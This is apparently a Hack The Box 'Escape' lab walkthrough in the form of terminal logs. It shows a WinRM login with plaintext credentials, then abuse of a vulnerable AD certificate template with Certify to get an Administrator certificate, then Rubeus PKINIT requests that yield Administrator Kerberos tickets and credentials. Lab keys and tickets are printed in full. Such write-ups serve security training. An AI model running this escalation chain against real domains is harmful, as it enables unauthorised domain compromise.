└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
sequel\ryan.cooper S-1-5-21-4078382237-1492182817-2568127209-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Read flag: user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/2/2024 1:25 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
d856abeedae532b8bbec897aca69d2de
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
Privilege Escalation
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe ; file Rubeus.exe
--2024-04-02 15:42:23-- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Rubeus.exe [following]
--2024-04-02 15:42:23-- https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Rubeus.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 446976 (436K) [application/octet-stream]
Saving to: ‘Rubeus.exe’
Rubeus.exe 100%[===========================================>] 436.50K --.-KB/s in 0.1s
2024-04-02 15:42:24 (4.00 MB/s) - ‘Rubeus.exe’ saved [446976/446976]
Rubeus.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Certify.exe ; file Certify.exe
--2024-04-02 15:43:33-- https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Certify.exe
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Certify.exe [following]
--2024-04-02 15:43:34-- https://raw.githubusercontent.com/r3motecontrol/Ghostpack-CompiledBinaries/master/Certify.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 174080 (170K) [application/octet-stream]
Saving to: ‘Certify.exe’
Certify.exe 100%[===========================================>] 170.00K --.-KB/s in 0.06s
2024-04-02 15:43:34 (2.61 MB/s) - ‘Certify.exe’ saved [174080/174080]
Certify.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /mnt/oscp/writeups/HTB/HTB_Escape/Certify.exe
Info: Uploading /mnt/oscp/writeups/HTB/HTB_Escape/Certify.exe to C:\Users\Ryan.Cooper\Desktop\Certify.exe
Data: 232104 bytes of 232104 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /mnt/oscp/writeups/HTB/HTB_Escape/Rubeus.exe
Info: Uploading /mnt/oscp/writeups/HTB/HTB_Escape/Rubeus.exe to C:\Users\Ryan.Cooper\Desktop\Rubeus.exe
Data: 595968 bytes of 595968 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/2/2024 2:50 PM 174080 Certify.exe
-a---- 4/2/2024 2:50 PM 446976 Rubeus.exe
-ar--- 4/2/2024 1:25 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
Vulnerability verification on a remote host
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.1166693
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
Request a new certificate as domain administrator
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 13
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsCdZPTk1EOeDrmfraPlyM+wAlmbUgqWwGyMLA/DYc4HRoi0x
7IS9/NmSmEQACUcu7+9IQuuphxAR/tRRsMUYxLQwrCvgJg4D16+RR/pPwuKFSXse
wH4muE2MlTSr0jSD1vzCQGUs6Hqr//T1KZhFGYyDrcTaUaUPZw2/bgb//W6gtcFe
usYMT5cgZKSObPWV0Nr07Fvi3QkzJcboC4sYa3QKp3AlzzYfeWt/4u0twelMSN+C
85OWKDB8G1iMYkEyQzovfzxyLAw5LCnNABuUB2H+fWuQQ/zXY/rRPD03fiufnGAz
ACbW0aEYBMkTaRzmctCnXYS5F/bDhLhAMQzt0QIDAQABAoIBAD+PQxzbKnGaB6KD
bqam8vUXH7MlEWK+pAd2on/ehEtROTHaOtxLnT3Bx6pXRugSHjaG0T0MSVQpkUSw
mXU9+Mzo83L8NdmlTu+hMruU7vizwUIdQaBVJGV13dbsdV7YggWtl+2iVAziTnOB
kIBcp/orAExP7jJta1xU0pDBx9ZKXgrKhGrQEJUHoLzLxK1baC6ZPhkXwzG9DWVC
uNPZBi+ycbp9wbBs7T19Y68EPbr+wELMt2nDK00kGF/F9bITFfATukoARQTuoOfe
YLfcAuobjkrw4OPoqDevajyB3F/zjKyftJBfoCwxt/c/IVXyv3pcwsUfGjBle2lu
McEQH90CgYEA4EgKxfHaNwn5VU/ho56fPp9rVw3aGnSnwsIyN1zxLVWWm/pW3/pk
yHyb2ycwC8oIXBldbOO5aSSoFIiU1i/BpBjvTjdGJ16ory+YRi1Th+vJl4VSv4BX
XxqWQK6wXbHAOs2568UcaTiVpettfgOaRL5P3ZHVx7SGBI8LqB7u788CgYEAyRDg
CT2egqBCZItgEldAYT1OssrAT2PzPaJAK+KqIpfCEhgCkaSixTkgTi0IWpBCP9u0
gsrEEZPex2JIUume5WuQwdh7VNi3bj7Jk6kKKdsnjHm5cO+KGcMXOa0Kq66mK+/Z
M4QMbMx1RGG0yF0vK5JbCXQEQip3n1lXd86LEF8CgYEA0JjwvC43QR2bswc62806
Wyo20Z7mjdiV94Ra5DcjcYC7NZNena7rcbTD2M7X1v8vS0mkJRSga/RWB9MIazW7
qn4uhNbP/uoBhf6EaDDcEfzxYGX2EnqxyJiXys0u59Xc7lRNacXIqOyh8tHG4n9D
SlCfQ3rSFI4IX9ETjGhI3u0CgYBRAPZxYpzQnYYCAdCzsukiA9QH3f06PtdJNmvK
AmhuxVsPdRLb4EsfT9N/C095RPMbzQTdSJlTR5KSGztuA+bbIMnR/sg5N5I23R7S
2WBZ2owFYSjfofGuTVW3C8rnvdX+j4Oe6I0k6/42jXKK4lfVowIAPfhVO8yzqwe9
Ib4O2wKBgQCZRB1Y1i9F/0yltsryCXs9jIwJasntW0BCf7SOd0fwhK5Ky358UDwY
vl9GuD8hbNBRzsaq3Kl228s5BYygQfRBfi6iDX5ljatFPR5NbSdNyGeQRvWZSwHt
V0K1Od/pd8y5RwBAnfFwpGHkWJUCFR/oDN93wd0k84z99XI3rgSZwg==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA0zDKJmfEOkqwAAAAAADTANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjQwNDAyMjE0NjExWhcNMzQwMzMx
MjE0NjExWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCwJ1k9OTUQ54OuZ+to+XIz7ACW
ZtSCpbAbIwsD8NhzgdGiLTHshL382ZKYRAAJRy7v70hC66mHEBH+1FGwxRjEtDCs
K+AmDgPXr5FH+k/C4oVJex7Afia4TYyVNKvSNIPW/MJAZSzoeqv/9PUpmEUZjIOt
xNpRpQ9nDb9uBv/9bqC1wV66xgxPlyBkpI5s9ZXQ2vTsW+LdCTMlxugLixhrdAqn
cCXPNh95a3/i7S3B6UxI34Lzk5YoMHwbWIxiQTJDOi9/PHIsDDksKc0AG5QHYf59
a5BD/Ndj+tE8PTd+K5+cYDMAJtbRoRgEyRNpHOZy0KddhLkX9sOEuEAxDO3RAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZQIBBDApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFPyI/uFy2mHWjYphfEe9syApgAHJ
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAlWEWpJlq9nwJcsGqjWPomDXJ+CEeVVYEDT5iqho1MT7RT/0gaUJ6ahxP
pGzZNFiDPdtkXeOakjwq7hPyUIsubxy591cvME8qXqxQ/3LPnCCJ+XQf7iTqaHPw
mHrjXM5++igMx0boWIm3EUXK65aLjSqnZ4dYtOkLNLhCTJxGCkpS7b7gEpGlRbZF
Q3pPwSmCz65qWq3Xa7oLrSf4DXE3HG2SUZubU1rqY0fPjkGcWiosj8oMFm8pNLl/
4Sjwkj8puOV1TxuvqLRC3Cxv7li48A5hZgjvXKbP7wstaPc+qEV0XTXSzkXTjVpg
PjdYuO9/NxArsaBv1KGDP54j6xMuiQ==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.1103954
Convert cert.pem to certificate cert.pfx
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ ls -l cert.*
-rwxr-xr-x 1 kali kali 3846 Apr 2 22:25 cert.pem
-rwxr-xr-x 1 kali kali 3425 Apr 3 07:06 cert.pfx
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
Upload a cert.pfx to remote host
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> upload /mnt/oscp/writeups/HTB/HTB_Escape/cert.pfx
Info: Uploading /mnt/oscp/writeups/HTB/HTB_Escape/cert.pfx to C:\Users\Ryan.Cooper\Desktop\cert.pfx
Data: 4564 bytes of 4564 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/3/2024 6:17 AM 3425 cert.pfx
-a---- 4/3/2024 6:08 AM 174080 Certify.exe
-a---- 4/3/2024 6:07 AM 446976 Rubeus.exe
-ar--- 4/3/2024 5:57 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
Run Rubeus - Pass-The-Ticket
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop>
^[[A*Evil-WinRM* PS C:\Users\Ryan.Cooper\Deskt.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::ac0f:1ee0:3c99:6c3c%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
[+] Ticket successfully imported!
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 4/3/2024 6:20:19 AM
EndTime : 4/3/2024 4:20:19 PM
RenewTill : 4/10/2024 6:20:19 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : IjVm0I1X+YWLe986VSbIyA==
ASREP (key) : 89E82470ADA2642221D8379A3A87C1BA
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::ac0f:1ee0:3c99:6c3c%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBL+/cOGHSdZS
3ohX14OtjRfHcscLoxz2kXODAz1VF/qkMldTM6y8J+y6sWBMAku7KEf9jB5ZwwHbtAT4aoX/0Za+CzFD
z3mKIdITF7KDOIaB8V/YsMlsVZVegFgT/BTH2tUi3O3N/OxMsqSEwhYFcb+rMpk/McnuLJwcq59M/a7x
hKNHB+1e6nckC61WQfOzSzG8oaPLz3C8wQ6jylHipqVBsWk2zRNDcQitf2qAxlm/hTQMQ0IseM9uDt5M
B5d5xKwPD/6dXLKlYIcgLKX2/v6O01g5NPbA5Fi0FkELGVq/SB+AAUKA8J3jguqTdJ0KH2MMF9Yq0YqC
/PM/teEq1d2mj9bhLwo5Z5LjIhKszTjemI3oIzwNabnbiDu+BBDGr00Fjh6NktjdOChOrvZt7xCWrYWj
wvsT5Z7SNcepufeFquKm3A9+DDwWx20QmphvqB+wYPFq92mxcsVcX0ONVUYNyr5i473MeAylLoRDKDqY
yZnfRiu9Eybw3nWxru50H5/b5hHZF+zdD0HCIhgluSlciHg7Ec+UPbTdOD/c6cDglMk4wp0pzVCa/ol0
Lr47fWE2NqxnXUrUh5UKY69qLvBqZgrX5d3CMguJzuZyujyR1bW5dJgSCI20cFT2klBQc60VzBkKzujo
cNR7iDrkVhYvZbIBH4LNlOft12/WHE2h1Q4P3MEeul0x4K6M6q8fw7YFdN29H8ZhjpfklX5cKJoZaDRd
GP6lfJGqFZ59Ku23n1tkmSSA2Ji6jPbYuG7VR6x6gM2ZfP75rxG1xU79BKNoftSfQvpyO6Ws85FDXaU2
1GUjLaoJmxBMA8rhJzOU4ETW9fBPzAhCA8PV/+Y5cnkcYaD27hPY8oNzkjVx1ziABxkLSOqXtu5dowpN
Qe4jZJsb3Nt1Hu4ZnwrT1RaZdP9XYN3BmYPQG6iuoJW4G1EPjr/cvTeovx61hYPy5FGkz/jzHTPC2ilR
AbTGD79rt68/0Q/qyEKA+RwyrqWhlf1DoZqpnCD9XCv/5C9j02fkiT8cHHb/zg05T8oTsb4WkaZKOMt5
guV4HwdEZlmWq3aDTjF8yy4ZKJfmH3n3BSrPMdjd73gXa1KyjuQ1Q5xo571OTIaCsvX6i5/xGcMWzrfU
zz2p4HbsexeM+O2Dha+Zj1brK9NIX/emzggWOU+n/qGiwajPxr6DawEZX7TkC4zEX2ApVmylf/dKN6he
0jxsXIO9f8xkuMIMUw5Gk95pjVZ3I3Uc8WILQtgKKTq1Y9LIub8OEI/kfhWArxBqIfJRRnjYojVABKbf
Cj8QyKxRa5JYclie3PcoJLFFJe43l5cPQjc/WXihurnp8/q4B9U+GZkcKtCsE9oVzIY6jGt7ecAhvPV+
J/DDaFZtiSOGVOgqjodPU6QwL0RtEHD+g/CDiPJzMKhNEDnKW3zFuMeY3xEWYdeT94RHTqOa7C6ORlIV
a71GkqMYmwM5AJWKvKJr1jB5W/ovha26Zv9deAuMLQsnkW1UzQHBL46YL9G/rYpskI3tgN8dKvPJBnz3
S3GR0w06Lz/neH+Na369JJ6mj2QnqEBunZVmX7wyjNwlq6VwYpZB33OYPr6XY3PE3mirlI0XEcRTLoxs
30/fzamCt1OV9JODkuMz1I8PWtbSe6LBHYYD7GgkJY44NGCxhXlyoc+OtFd/cgdjThs/hQz08zcyTdSh
tUXUMmgX7jbEgF54oKE50KOB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oBswGaADAgEXoRIE
EC/paZP0rYJDshTDK4fYqmehDBsKU0VRVUVMLkhUQqIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAADhAAClERgPMjAyNDA0MDMxMzIwMzdaphEYDzIwMjQwNDAzMjMyMDM3WqcRGA8yMDI0MDQxMDEz
MjAzN1qoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 4/3/2024 6:20:37 AM
EndTime : 4/3/2024 4:20:37 PM
RenewTill : 4/10/2024 6:20:37 AM
